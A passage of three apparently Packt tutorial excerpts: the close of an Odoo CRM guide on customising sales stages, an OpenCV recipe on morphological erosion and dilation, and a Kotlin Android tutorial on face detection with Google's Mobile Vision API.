This brings up a list of the actions that will generate notifications to followers: The checkbox next to Discussions indicates that I should be notified of any discussions related to this document. However, I would not be notified, for example, if the stage changed. When you send a message, by default the customer will become a follower of the document. Then, whenever the status of the document changes, the customer will receive an email. Test out all your processes before integrating with an email server. Modifying the stages of the sale We have seen that Odoo provides a default set of sales stages. Many times, however, you will want to customize the stages to best deliver an outstanding customer experience. Moving an opportunity through stages should trigger actions that create a relationship with the customer and demonstrate your understanding of their needs. A customer in the qualification stage of a sale will have much different needs and much different expectations than a customer that is in the negotiation phase. For our case study, there are sometimes printing jobs that are technically complex to accomplish. With different jerseys for a variety of teams, the final details need to go through a final technical review and approval process before the order can be entered and verified. From a business perspective, the goal is not just to document the stage of the sales cycle; the primary goal is to use this information to drive customer interactions and improve the overall customer experience. To add a stage to the sales process, bring up Your Pipeline and then click on the ADD NEW COLUMN area in the right of the form to bring up a little popup to enter the name for the new stage: After you have added the column to the sales process, you can use your mouse to drag and drop the columns into the order that you wish them to appear. We are now ready to begin the technical approval stage for this opportunity. Drag and drop the Sports Team Project opportunity over to the Technical Approval column in the Kanban view. The following screenshot is of the opportunities Kanban view after adding the technical approval stage: We now see the Technical Approval column in our Kanban view and have moved over the opportunity. You will also notice that any time you change the stage of an opportunity that there will be an entry that will be created in the OpenChatter section at the bottom of the form. In addition to the ability to drag and drop an opportunity into a new stage, you can also change the stage of an opportunity by going into the form view. Closing the sale After a lot of hard work, we have finally won the opportunity, and it is time to turn this opportunity into a quotation. At this point, Odoo makes it easy to take that opportunity and turn it into an actual quotation. Open up the opportunity and click the New Quotation tab at the top of the opportunity form: Unlike Odoo 8, which prompts for more information, in Odoo 10 you get taken to a new quote with the customer information already filled in: We installed the CRM module, created salespeople, and proceeded to develop a system to manage the sales process. To modify stages in the sales cycle and turn the opportunity into a quotation using Odoo 11, grab the latest edition  Working with Odoo 11 - Third Edition. ERP tool in focus: Odoo 11 Building Your First Odoo Application How to Scaffold a New module in Odoo 11
OpenCV: Image Processing using Morphological Filters

Packt, 25 May 2011
OpenCV 2 Computer Vision Application Programming Cookbook: over 50 recipes to master this library of programming functions for real-time computer vision.

Morphological filtering is a theory developed in the 1960s for the analysis and processing of discrete images. It defines a series of operators which transform an image by probing it with a predefined shape element. The way this shape element intersects the neighborhood of a pixel determines the result of the operation. This article presents the most important morphological operators. It also explores the problem of image segmentation using algorithms working on the image morphology.

Eroding and dilating images using morphological filters

Erosion and dilation are the most fundamental morphological operators. Therefore, we will present them in this first recipe. The fundamental instrument in mathematical morphology is the structuring element. A structuring element is simply defined as a configuration of pixels (a shape) on which an origin is defined (also called the anchor point). Applying a morphological filter consists of probing each pixel of the image using this structuring element. When the origin of the structuring element is aligned with a given pixel, its intersection with the image defines a set of pixels on which a particular morphological operation is applied. In principle, the structuring element can be of any shape, but most often, a simple shape such as a square, circle, or diamond with the origin at the center is used (mainly for efficiency reasons).

Getting ready

As morphological filters usually work on binary images, we will use a binary image produced through thresholding. However, since in morphology the convention is to have foreground objects represented by high (white) pixel values and the background by low (black) pixel values, we have negated the image.

How to do it...

Erosion and dilation are implemented in OpenCV as simple functions, which are cv::erode and cv::dilate. Their use is straightforward:

// Read input image
cv::Mat image = cv::imread("binary.bmp");
// Erode the image
cv::Mat eroded; // the destination image
cv::erode(image, eroded, cv::Mat());
// Display the eroded image
cv::namedWindow("Eroded Image");
cv::imshow("Eroded Image", eroded);
// Dilate the image
cv::Mat dilated; // the destination image
cv::dilate(image, dilated, cv::Mat());
// Display the dilated image
cv::namedWindow("Dilated Image");
cv::imshow("Dilated Image", dilated);

The two images produced by these function calls are seen in the following screenshot. Erosion is shown first, followed by the dilation result.

How it works...

As with all other morphological filters, the two filters of this recipe operate on the set of pixels (or neighborhood) around each pixel, as defined by the structuring element. Recall that when applied to a given pixel, the anchor point of the structuring element is aligned with this pixel location, and all pixels intersecting the structuring element are included in the current set. Erosion replaces the current pixel with the minimum pixel value found in the defined pixel set. Dilation is the complementary operator, and it replaces the current pixel with the maximum pixel value found in the defined pixel set. Since the input binary image contains only black (0) and white (255) pixels, each pixel is replaced by either a white or black pixel. A good way to picture the effect of these two operators is to think in terms of background (black) and foreground (white) objects.
With erosion, if the structuring element, when placed at a given pixel location, touches the background (that is, one of the pixels in the intersecting set is black), then this pixel will be sent to the background. In the case of dilation, if the structuring element on a background pixel touches a foreground object, then this pixel will be assigned a white value. This explains why, in the eroded image, the size of the objects has been reduced. Observe how some of the very small objects (that can be considered as "noisy" background pixels) have also been completely eliminated. Similarly, the dilated objects are now larger and some of the "holes" inside of them have been filled.

By default, OpenCV uses a 3x3 square structuring element. This default structuring element is obtained when an empty matrix (that is, cv::Mat()) is specified as the third argument in the function call, as it was done in the preceding example. You can also specify a structuring element of the size (and shape) you want by providing a matrix in which the non-zero elements define the structuring element. In the following example, a 7x7 structuring element is applied:

cv::Mat element(7, 7, CV_8U, cv::Scalar(1));
cv::erode(image, eroded, element);

The effect is obviously much more destructive in this case, as seen here. Another way to obtain the same result is to repetitively apply the same structuring element on an image. The two functions have an optional parameter to specify the number of repetitions:

// Erode the image 3 times.
cv::erode(image, eroded, cv::Mat(), cv::Point(-1,-1), 3);

The origin argument cv::Point(-1,-1) means that the origin is at the center of the matrix (default), and it can be defined anywhere on the structuring element. The image obtained will be identical to the one we obtained with the 7x7 structuring element. Indeed, eroding an image twice is like eroding an image with a structuring element dilated with itself. This also applies to dilation.

Finally, since the notion of background/foreground is arbitrary, we can make the following observation (which is a fundamental property of the erosion/dilation operators). Eroding foreground objects with a structuring element can be seen as a dilation of the background part of the image. Or more formally:

The erosion of an image is equivalent to the complement of the dilation of the complement image.
The dilation of an image is equivalent to the complement of the erosion of the complement image.

There's more...

It is important to note that even if we applied our morphological filters on binary images here, these can also be applied on gray-level images with the same definitions. Also note that the OpenCV morphological functions support in-place processing. This means you can use the input image as the destination image. So you can write:

cv::erode(image, image, cv::Mat());

OpenCV creates the required temporary image for you for this to work properly.
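For readers working from Python rather than C++, the same operations are available through OpenCV's cv2 bindings. The following is a minimal, hedged sketch (not part of the original recipe) that mirrors the erosion and dilation calls above; the input file name is a placeholder for a binarized image:

```python
# A hedged sketch of the same erosion/dilation recipe using OpenCV's Python bindings.
# The input file name is a placeholder for a binarized image.
import cv2
import numpy as np

image = cv2.imread("binary.bmp", cv2.IMREAD_GRAYSCALE)

# Default 3x3 structuring element (None plays the role of cv::Mat() in the C++ API)
eroded = cv2.erode(image, None)
dilated = cv2.dilate(image, None)

# A 7x7 square structuring element, equivalent to cv::Mat(7,7,CV_8U,cv::Scalar(1))
element = np.ones((7, 7), np.uint8)
eroded_7x7 = cv2.erode(image, element)

# Applying the default element three times via the iterations parameter
eroded_3x = cv2.erode(image, None, iterations=3)

cv2.imshow("Eroded Image", eroded)
cv2.imshow("Dilated Image", dilated)
cv2.waitKey(0)
```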
Building an Android App using the Google Faces API [Tutorial]

Sugandha Lahoti, 27 Sep 2018
The ability of computers to perform tasks such as identifying objects has always been a humongous task for both the software and the required architecture. This isn't the case anymore since the likes of Google, Amazon, and a few other companies have done all the hard work, providing the infrastructure and making it available as a cloud service. It should be noted that they are as easy to access as making REST API calls. Read Also: Machine Learning as a Service (MLaaS): How Google Cloud Platform, Microsoft Azure, and AWS are democratizing Artificial Intelligence This article is taken from the book Learning Kotlin by building Android Applications by Eunice Adutwumwaa Obugyei and Natarajan Raman. This book will teach you programming in Kotlin including data types, flow control, lambdas, object-oriented, and functional programming while building  Android Apps. In this tutorial, you will learn how to use the face detection API from Google's Mobile Vision API to detect faces and add fun functionalities such as adding rabbit ears to a user's picture. We will cover the following topics: Identifying human faces in an image Tracking human faces from a camera feed Identifying specific parts of the face (for example, eyes, ears, nose, and mouth) Drawing graphics on specific parts of a detected face in an image (for example, rabbit ears over the user's ears) Introduction to Mobile Vision The Mobile Vision API provides a framework for finding objects in photos and videos. The framework can locate and describe visual objects in images or video frames, and it has an event-driven API that tracks the position of those objects. Currently, the Mobile Vision API includes face, barcode, and text detectors. Faces API concepts Before diving into coding the features, it is necessary that you understand the underlying concepts of the face detection capabilities of the face detection API. From the official documentation: Face detection is the process of automatically locating human faces in visual media (digital images or video). A face that is detected is reported at a position with an associated size and orientation. Once a face is detected, it can be searched for landmarks such as the eyes and nose. A key point to note is that only after a face is detected, will landmark such as eyes and a nose be searched for. As part of the API, you could opt out of detecting these landmarks. Note the difference between face detection and face recognition. While the former is able to recognize a face from an image or video, the latter does the same and is also able to tell that a face has been seen before. The former has no memory of a face it has detected before. We will be using a couple of terms in this section, so let me give you an overview of each of these before we go any further: Face tracking extends face detection to video sequences. When a face appears in a video for any length of time, it can be identified as the same person and can be tracked. It is important to note that the face that you are tracking must appear in the same video. Also, this is not a form of face recognition; this mechanism just makes inferences based on the position and motion of the face(s) in a video sequence. A landmark is a point of interest within a face. The left eye, right eye, and nose base are all examples of landmarks. The Face API provides the ability to find landmarks on a detected face. Classification is determining whether a certain facial characteristic is present. 
For example, a face can be classified with regards to whether its eyes are open or closed or smiling or not. Getting started – detecting faces You will first learn how to detect a face in a photo and its associated landmarks. We will need some requirements in order to pursue this. With a minimum of Google Play Services 7.8, you can use the Mobile Vision APIs, which provide the face detection APIs. Make sure you update your Google Play Services from the SDK manager so that you meet this requirement. Get an Android device that runs Android 4.2.2 or later or a configured Android Emulator. The latest version of the Android SDK includes the SDK tools component. Creating the FunyFace project Create a new project called FunyFace. Open up the app module's build.gradle file and update the dependencies to include the Mobile Vision APIs: dependencies { implementation fileTree(dir: 'libs', include: ['*.jar']) implementation"org.jetbrains.kotlin:kotlin-stdlib-jre7:$kotlin_version" implementation 'com.google.android.gms:play-services-vision:11.0.4' ... } Now, update your AndroidManifest.xml to include meta data for the faces API: <meta-data android:name="com.google.android.gms.vision.DEPENDENCIES" android:value="face" /> Now, your app is ready to use the face detection APIs. To keep things simple, for this lab, you're just going to process an image that is already present in your app. Add the following image to your res/drawable folder: Now, this is how you will go about performing face detection. You will first load the image into memory, get a Paint instance, and create a temporary bitmap based on the original, from which you will create a canvas. Create a frame using the bitmap and then call the detect method on FaceDetector, using this frame to get back SparseArray of face objects. Well, let's get down to business—this is where you will see how all of these play out. First, open up your activity_main.xml file and update the layout so that it has an image view and a button. See the following code: <?xml version="1.0" encoding="utf-8"?> <FrameLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" xmlns:app="http://schemas.android.com/apk/res-auto" tools:context="com.packtpub.eunice.funyface.MainActivity"> <ImageView android:id="@+id/imageView" android:layout_width="match_parent" android:layout_height="match_parent" android:src="@mipmap/ic_launcher_round" app:layout_constraintBottom_toTopOf="parent" android:scaleType="fitCenter"/> <Button android:id="@+id/button" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_gravity="bottom|center" android:text="Detect Face"/> </FrameLayout> That is all you need to do here so that you have FrameLayout with ImageView and a button. Now, open up MainActivity.kt and add the following import statements. This is just to make sure that you import from the right packages as you move along. 
Now, open up MainActivity.kt and add the following import statements; this is just to make sure that you import from the right packages as you move along. In your onCreate() method, attach a click listener to the button from your MainActivity layout:

package com.packtpub.eunice.funyface

import android.graphics.*
import android.graphics.drawable.BitmapDrawable
import android.os.Bundle
import android.support.v7.app.AlertDialog
import android.support.v7.app.AppCompatActivity
import com.google.android.gms.vision.Frame
import com.google.android.gms.vision.face.FaceDetector
import kotlinx.android.synthetic.main.activity_main.*

class MainActivity : AppCompatActivity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        button.setOnClickListener {
            detectFace()
        }
    }
}

Loading the image

In your detectFace() method, you will first load your image from the drawable folder into memory and create a bitmap from it. Since you will be updating this bitmap to paint over it once the face is detected, you need to make it mutable. This is the line that makes your bitmap mutable:

bitmapOptions.inMutable = true

See the following implementation:

private fun detectFace() {
    // Load the image
    val bitmapOptions = BitmapFactory.Options()
    bitmapOptions.inMutable = true
    val myBitmap = BitmapFactory.decodeResource(
            applicationContext.resources,
            R.drawable.children_group_picture,
            bitmapOptions)
}

Creating a Paint instance

Use the Paint API to get an instance of the Paint class. You will only draw around the face, not paint over the whole face. To do this, set a thin stroke width, give it a color (red in our case), and set the paint style to STROKE using Paint.Style.STROKE:

// Get a Paint instance
val myRectPaint = Paint()
myRectPaint.strokeWidth = 5F
myRectPaint.color = Color.RED
myRectPaint.style = Paint.Style.STROKE

The Paint class holds the style and color information used to draw text, bitmaps, and various shapes.

Creating a canvas

To get a canvas, first create a bitmap using the dimensions of the bitmap you created earlier. With this canvas, you will paint over the bitmap to draw the outline of the face after it has been detected:

// Create a canvas using the dimensions from the image's bitmap
val tempBitmap = Bitmap.createBitmap(myBitmap.width, myBitmap.height, Bitmap.Config.RGB_565)
val tempCanvas = Canvas(tempBitmap)
tempCanvas.drawBitmap(myBitmap, 0F, 0F, null)

The Canvas class holds the draw calls: a canvas is a drawing surface that provides various methods for drawing onto a bitmap.
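Before moving on, if you want to sanity-check this drawing setup, one quick experiment (not one of the book's steps) is to draw a rectangle at a fixed position and push the result straight to the ImageView:

// Illustrative only: draw a fixed rectangle on the temporary canvas and
// display the result, to confirm the bitmap, canvas, and Paint instance
// are wired up correctly.
tempCanvas.drawRoundRect(RectF(50F, 50F, 250F, 250F), 2F, 2F, myRectPaint)
imageView.setImageDrawable(BitmapDrawable(resources, tempBitmap))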
Creating the face detector

Everything you have done so far is basically housekeeping. You will now access the FaceDetector API, with which you will detect the face in the image. Tracking is disabled for now, as you only want to detect the face in a still image at this stage.

Note that on its first run, the Play Services SDK will take some time to initialize the Faces API, and it may or may not have completed this process by the time you intend to use it. Therefore, as a safety check, you need to ensure its availability before using it. In this case, you will show a simple dialog to the user if the FaceDetector is not ready when the app is run. Also note that you may need an internet connection while the SDK initializes, and enough storage space, as the initialization may download some native libraries onto the device:

// Create a FaceDetector
val faceDetector = FaceDetector.Builder(applicationContext)
        .setTrackingEnabled(false)
        .build()

if (!faceDetector.isOperational) {
    AlertDialog.Builder(this)
            .setMessage("Could not set up the face detector!")
            .show()
    return
}

Detecting the faces

Now, use the detect() method of the faceDetector instance to get the faces and their metadata. The result will be a SparseArray of Face objects:

// Detect the faces
val frame = Frame.Builder().setBitmap(myBitmap).build()
val faces = faceDetector.detect(frame)

Drawing rectangles on the faces

Now that you have the faces, iterate through the array to get the coordinates of the bounding rectangle for each face. Rectangles require the x and y values of the top-left and bottom-right corners, but the information available only gives the left and top positions, so you have to calculate the bottom right using the left, top, width, and height. Then, release the faceDetector to free up resources. Here is the code:

// Mark out the identified face
for (i in 0 until faces.size()) {
    val thisFace = faces.valueAt(i)
    val left = thisFace.position.x
    val top = thisFace.position.y
    val right = left + thisFace.width
    val bottom = top + thisFace.height
    tempCanvas.drawRoundRect(RectF(left, top, right, bottom), 2F, 2F, myRectPaint)
}
imageView.setImageDrawable(BitmapDrawable(resources, tempBitmap))

// Release the FaceDetector
faceDetector.release()

Results

All set. Run the app, press the DETECT FACE button, and wait a moment. The app should detect the face, and a box should appear around it.

Okay, let's move on and add some fun to the detected faces. To do this, you need to identify the position of the specific landmark you want and then draw your graphic over it. Each landmark reports its type and position, so you can iterate over a face's landmarks and react to the one you are interested in. Note that for landmarks to be reported at all, the FaceDetector must be built with setLandmarkType(FaceDetector.ALL_LANDMARKS), so add that call to the builder you created earlier. The following update to the for loop that drew the rectangle draws a bitmap (eyePatchBitmap, which you will need to have decoded from your resources beforehand) centered on the nose base landmark:

// Mark out the identified face
for (i in 0 until faces.size()) {
    ...

    for (landmark in thisFace.landmarks) {
        val x = landmark.position.x
        val y = landmark.position.y

        // NOSE_BASE comes from com.google.android.gms.vision.face.Landmark
        when (landmark.type) {
            NOSE_BASE -> {
                val scaledWidth = eyePatchBitmap.getScaledWidth(tempCanvas)
                val scaledHeight = eyePatchBitmap.getScaledHeight(tempCanvas)
                tempCanvas.drawBitmap(eyePatchBitmap,
                        x - scaledWidth / 2,
                        y - scaledHeight / 2,
                        null)
            }
        }
    }
}

Run the app again and take note of where the graphic lands on each detected face. There you have it! That's funny, right?

Summary

In this tutorial, we learned how to use the Mobile Vision APIs, in this case the Faces API. There are a few things to note here: this program is not optimized for production. Some things you can do on your own are to load the image and do the processing in a background thread, and to let the user pick images from sources other than the static one used here. You can also get more creative with the filters and how they are applied. Finally, you can enable the tracking feature on the FaceDetector instance and feed in a video to try out face tracking.

To know more about Kotlin APIs as a preliminary for building stunning applications for Android, read our book Learning Kotlin by building Android Applications.
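As a parting illustration of the first suggestion above, here is one possible way to move the detection work off the main thread. This is a sketch based on an assumption, not code from the book, and it presumes the bitmap and detector built in the earlier steps are available to the method, for example as properties of the activity:

// Illustrative sketch: run the heavy detect() call on a background thread
// and post the drawing work back to the UI thread.
private fun detectFaceAsync() {
    Thread {
        val frame = Frame.Builder().setBitmap(myBitmap).build()
        val faces = faceDetector.detect(frame)   // off the UI thread

        runOnUiThread {
            // Iterate over 'faces', draw on the canvas, and update the
            // ImageView here, exactly as in detectFace() above.
        }
    }.start()
}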